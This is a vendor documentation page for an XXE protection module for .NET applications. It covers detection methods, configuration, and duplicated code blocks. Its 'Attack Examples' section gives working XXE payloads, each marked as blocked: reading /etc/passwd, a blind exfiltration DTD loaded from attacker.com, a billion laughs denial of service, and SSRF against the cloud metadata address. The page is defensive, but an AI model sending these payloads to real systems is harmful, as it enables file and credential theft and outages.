XXE Protection

Protection Module: XmlExternalEntity

Prevents XML External Entity (XXE) attacks by securing XML parsing and blocking dangerous entity expansion.

Available for:

• ASP.NET Core
• ASP.NET Framework
• Azure Functions
• SOAP Services

How It Works

XXE Protection monitors XML parsing operations to prevent external entity attacks.

Detection Methods:

• DOCTYPE Detection - Identifies <!DOCTYPE> declarations
• External Entity Detection - Detects <!ENTITY> with external references
• Parameter Entity Detection - Identifies parameter entity usage
• DTD Processing Analysis - Monitors DTD loading attempts
• SYSTEM/PUBLIC Keyword Detection - Blocks external resource loading

Attack Types Detected:

• Classic XXE (file disclosure)
• Blind XXE (out-of-band data exfiltration)
• SSRF via XXE
• Denial of Service (billion laughs attack)
• Local file inclusion

Configuration

{
  "protections": {
    "XmlExternalEntity": {
      "enabled": true,
      "action": "block"
    }
  }
}

{
  "protections": {
    "XmlExternalEntity": {
      "enabled": true,
      "action": "block"
    }
  }
}

ASP.NET Core

builder.Services.AddBytehideMonitor(monitor => monitor
    .WithProtection(ProtectionModuleType.XmlExternalEntity, ActionType.Block)
);

builder.Services.AddBytehideMonitor(monitor => monitor
    .WithProtection(ProtectionModuleType.XmlExternalEntity, ActionType.Block)
);

Attack Examples

Classic XXE - File Disclosure

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- Status: BLOCKED -->

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<!-- Status: BLOCKED -->

Blind XXE - OOB Exfiltration

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root></root>
<!-- Status: BLOCKED -->

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
  %xxe;
]>
<root></root>
<!-- Status: BLOCKED -->

Billion Laughs Attack

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
<!-- Status: BLOCKED -->

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
]>
<lolz>&lol2;</lolz>
<!-- Status: BLOCKED -->

SSRF via XXE

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>
<!-- Status: BLOCKED -->

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root>&xxe;</root>
<!-- Status: BLOCKED -->

Platform Compatibility

Related Protections

• SSRF
• Path Traversal